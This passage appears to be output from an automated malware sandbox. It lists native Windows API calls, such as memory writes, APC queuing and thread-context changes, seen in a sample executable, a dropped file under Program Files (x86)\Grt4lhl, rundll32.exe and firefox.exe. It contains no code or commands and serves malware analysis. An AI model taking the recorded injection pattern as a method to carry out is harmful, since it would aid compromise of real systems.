        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E8F5050 appears 36 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1EA6E692 appears 86 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1EA47BE4 appears 96 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E8BB910 appears 268 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E93E692 appears 86 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1EA7EF10 appears 105 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E94EF10 appears 105 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E8AB910 appears 268 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E917BE4 appears 96 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1EA35050 appears 36 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E905050 appears 36 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E92E692 appears 86 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E93EF10 appears 105 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E9EB910 appears 268 times
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: String function: 1E907BE4 appears 96 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043EEF10 appears 105 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043B7BE4 appears 96 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043A5050 appears 36 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 043DE692 appears 86 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0435B910 appears 268 times
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023223E2 NtProtectVirtualMemory,2_2_023223E2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231C88B NtAllocateVirtualMemory,LoadLibraryA,2_2_0231C88B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023206A2 NtWriteVirtualMemory,LoadLibraryA,2_2_023206A2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0232322B NtWriteVirtualMemory,2_2_0232322B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231CE0C NtWriteVirtualMemory,LoadLibraryA,2_2_0231CE0C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02320754 NtWriteVirtualMemory,LoadLibraryA,2_2_02320754
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1E902EB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902ED0 NtResumeThread,LdrInitializeThunk,10_2_1E902ED0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902E50 NtCreateSection,LdrInitializeThunk,10_2_1E902E50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902F00 NtCreateFile,LdrInitializeThunk,10_2_1E902F00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902CF0 NtDelayExecution,LdrInitializeThunk,10_2_1E902CF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902C30 NtMapViewOfSection,LdrInitializeThunk,10_2_1E902C30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902C50 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1E902C50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902DA0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1E902DA0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1E902DC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,10_2_1E902D10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1E902B90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902BC0 NtQueryInformationToken,LdrInitializeThunk,10_2_1E902BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1E902B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9029F0 NtReadFile,LdrInitializeThunk,10_2_1E9029F0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,10_2_1E9034E0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902E80 NtCreateProcessEx,10_2_1E902E80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902EC0 NtQuerySection,10_2_1E902EC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902E00 NtQueueApcThread,10_2_1E902E00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902FB0 NtSetValueKey,10_2_1E902FB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902F30 NtOpenDirectoryObject,10_2_1E902F30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E903C90 NtOpenThread,10_2_1E903C90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902CD0 NtEnumerateKey,10_2_1E902CD0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902C10 NtOpenProcess,10_2_1E902C10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E903C30 NtOpenProcessToken,10_2_1E903C30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902C20 NtSetInformationFile,10_2_1E902C20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902D50 NtWriteVirtualMemory,10_2_1E902D50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902A80 NtClose,10_2_1E902A80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902AA0 NtQueryInformationFile,10_2_1E902AA0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902AC0 NtEnumerateValueKey,10_2_1E902AC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902A10 NtWriteFile,10_2_1E902A10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902B80 NtCreateKey,10_2_1E902B80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902BE0 NtQueryVirtualMemory,10_2_1E902BE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902B00 NtQueryValueKey,10_2_1E902B00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902B20 NtQueryInformationProcess,10_2_1E902B20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9038D0 NtGetContextThread,10_2_1E9038D0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9029D0 NtWaitForSingleObject,10_2_1E9029D0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E904570 NtSuspendThread,10_2_1E904570
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E904260 NtSetContextThread,10_2_1E904260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A34E0 NtCreateMutant,LdrInitializeThunk,15_2_043A34E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2C30 NtMapViewOfSection,LdrInitializeThunk,15_2_043A2C30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2CF0 NtDelayExecution,LdrInitializeThunk,15_2_043A2CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2D10 NtQuerySystemInformation,LdrInitializeThunk,15_2_043A2D10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_043A2DC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2E50 NtCreateSection,LdrInitializeThunk,15_2_043A2E50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2F00 NtCreateFile,LdrInitializeThunk,15_2_043A2F00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2FB0 NtSetValueKey,LdrInitializeThunk,15_2_043A2FB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A29F0 NtReadFile,LdrInitializeThunk,15_2_043A29F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2A80 NtClose,LdrInitializeThunk,15_2_043A2A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2AC0 NtEnumerateValueKey,LdrInitializeThunk,15_2_043A2AC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_043A2B10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2B00 NtQueryValueKey,LdrInitializeThunk,15_2_043A2B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2B90 NtFreeVirtualMemory,LdrInitializeThunk,15_2_043A2B90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2B80 NtCreateKey,LdrInitializeThunk,15_2_043A2B80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2BC0 NtQueryInformationToken,LdrInitializeThunk,15_2_043A2BC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A4570 NtSuspendThread,15_2_043A4570
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A4260 NtSetContextThread,15_2_043A4260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A3C30 NtOpenProcessToken,15_2_043A3C30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2C20 NtSetInformationFile,15_2_043A2C20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2C10 NtOpenProcess,15_2_043A2C10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2C50 NtUnmapViewOfSection,15_2_043A2C50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A3C90 NtOpenThread,15_2_043A3C90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2CD0 NtEnumerateKey,15_2_043A2CD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2D50 NtWriteVirtualMemory,15_2_043A2D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2DA0 NtReadVirtualMemory,15_2_043A2DA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2E00 NtQueueApcThread,15_2_043A2E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2EB0 NtProtectVirtualMemory,15_2_043A2EB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2E80 NtCreateProcessEx,15_2_043A2E80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2ED0 NtResumeThread,15_2_043A2ED0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2EC0 NtQuerySection,15_2_043A2EC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2F30 NtOpenDirectoryObject,15_2_043A2F30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A38D0 NtGetContextThread,15_2_043A38D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A29D0 NtWaitForSingleObject,15_2_043A29D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2A10 NtWriteFile,15_2_043A2A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2AA0 NtQueryInformationFile,15_2_043A2AA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2B20 NtQueryInformationProcess,15_2_043A2B20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A2BE0 NtQueryVirtualMemory,15_2_043A2BE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004185E0 NtCreateFile,15_2_004185E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00418690 NtReadFile,15_2_00418690
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00418710 NtClose,15_2_00418710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004187C0 NtAllocateVirtualMemory,15_2_004187C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0041868D NtReadFile,15_2_0041868D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0041870A NtClose,15_2_0041870A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004187C2 NtAllocateVirtualMemory,15_2_004187C2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A2AD2 NtSetContextThread,22_2_022A2AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A23E2 NtProtectVirtualMemory,22_2_022A23E2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,22_2_0229C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,22_2_022A06A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A322B NtWriteVirtualMemory,22_2_022A322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,22_2_0229CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,22_2_022A0754
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF40004D02 NtCreateFile,25_2_000001BF40004D02
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A2AD2 NtSetInformationThread,26_2_022A2AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A23E2 NtProtectVirtualMemory,26_2_022A23E2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,26_2_0229C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,26_2_022A06A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A322B NtWriteVirtualMemory,26_2_022A322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,26_2_0229CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,26_2_022A0754
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_02332AD2 NtResumeThread,27_2_02332AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_023323E2 NtProtectVirtualMemory,27_2_023323E2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232C88B NtAllocateVirtualMemory,LoadLibraryA,27_2_0232C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_023306A2 NtWriteVirtualMemory,LoadLibraryA,27_2_023306A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0233322B NtWriteVirtualMemory,27_2_0233322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232CE0C NtWriteVirtualMemory,LoadLibraryA,27_2_0232CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_02330754 NtWriteVirtualMemory,LoadLibraryA,27_2_02330754
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,28_2_1EA32DC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk,28_2_1EA32D10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk,28_2_1EA32B90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk,28_2_1EA32B10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA334E0 NtCreateMutant,LdrInitializeThunk,28_2_1EA334E0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32EB0 NtProtectVirtualMemory,28_2_1EA32EB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32E80 NtCreateProcessEx,28_2_1EA32E80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32EC0 NtQuerySection,28_2_1EA32EC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32ED0 NtResumeThread,28_2_1EA32ED0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32E00 NtQueueApcThread,28_2_1EA32E00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32E50 NtCreateSection,28_2_1EA32E50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32FB0 NtSetValueKey,28_2_1EA32FB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32F30 NtOpenDirectoryObject,28_2_1EA32F30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32F00 NtCreateFile,28_2_1EA32F00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA33C90 NtOpenThread,28_2_1EA33C90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32CF0 NtDelayExecution,28_2_1EA32CF0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32CD0 NtEnumerateKey,28_2_1EA32CD0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32C20 NtSetInformationFile,28_2_1EA32C20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32C30 NtMapViewOfSection,28_2_1EA32C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA33C30 NtOpenProcessToken,28_2_1EA33C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32C10 NtOpenProcess,28_2_1EA32C10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32C50 NtUnmapViewOfSection,28_2_1EA32C50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32DA0 NtReadVirtualMemory,28_2_1EA32DA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32D50 NtWriteVirtualMemory,28_2_1EA32D50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32AA0 NtQueryInformationFile,28_2_1EA32AA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32A80 NtClose,28_2_1EA32A80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32AC0 NtEnumerateValueKey,28_2_1EA32AC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32A10 NtWriteFile,28_2_1EA32A10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32B80 NtCreateKey,28_2_1EA32B80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32BE0 NtQueryVirtualMemory,28_2_1EA32BE0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32BC0 NtQueryInformationToken,28_2_1EA32BC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32B20 NtQueryInformationProcess,28_2_1EA32B20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA32B00 NtQueryValueKey,28_2_1EA32B00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA338D0 NtGetContextThread,28_2_1EA338D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA329F0 NtReadFile,28_2_1EA329F0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA329D0 NtWaitForSingleObject,28_2_1EA329D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA34570 NtSuspendThread,28_2_1EA34570
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA34260 NtSetContextThread,28_2_1EA34260
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_005723E2 NtProtectVirtualMemory,28_2_005723E2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,28_2_0056C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_00563CE1 NtProtectVirtualMemory,28_2_00563CE1
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_00563E0E NtProtectVirtualMemory,28_2_00563E0E
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,29_2_1E8F2DC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,29_2_1E8F2D10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,29_2_1E8F2B90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,29_2_1E8F2B10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,29_2_1E8F34E0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2E80 NtCreateProcessEx,29_2_1E8F2E80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2EB0 NtProtectVirtualMemory,29_2_1E8F2EB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2EC0 NtQuerySection,29_2_1E8F2EC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2ED0 NtResumeThread,29_2_1E8F2ED0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2E00 NtQueueApcThread,29_2_1E8F2E00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2E50 NtCreateSection,29_2_1E8F2E50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2FB0 NtSetValueKey,29_2_1E8F2FB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2F00 NtCreateFile,29_2_1E8F2F00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2F30 NtOpenDirectoryObject,29_2_1E8F2F30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F3C90 NtOpenThread,29_2_1E8F3C90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2CD0 NtEnumerateKey,29_2_1E8F2CD0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2CF0 NtDelayExecution,29_2_1E8F2CF0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2C10 NtOpenProcess,29_2_1E8F2C10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2C20 NtSetInformationFile,29_2_1E8F2C20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F3C30 NtOpenProcessToken,29_2_1E8F3C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2C30 NtMapViewOfSection,29_2_1E8F2C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2C50 NtUnmapViewOfSection,29_2_1E8F2C50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2DA0 NtReadVirtualMemory,29_2_1E8F2DA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2D50 NtWriteVirtualMemory,29_2_1E8F2D50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2A80 NtClose,29_2_1E8F2A80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2AA0 NtQueryInformationFile,29_2_1E8F2AA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2AC0 NtEnumerateValueKey,29_2_1E8F2AC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2A10 NtWriteFile,29_2_1E8F2A10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2B80 NtCreateKey,29_2_1E8F2B80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2BC0 NtQueryInformationToken,29_2_1E8F2BC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2BE0 NtQueryVirtualMemory,29_2_1E8F2BE0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2B00 NtQueryValueKey,29_2_1E8F2B00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F2B20 NtQueryInformationProcess,29_2_1E8F2B20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F38D0 NtGetContextThread,29_2_1E8F38D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F29D0 NtWaitForSingleObject,29_2_1E8F29D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F29F0 NtReadFile,29_2_1E8F29F0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F4570 NtSuspendThread,29_2_1E8F4570
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_1E8F4260 NtSetContextThread,29_2_1E8F4260
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_005723E2 NtProtectVirtualMemory,29_2_005723E2
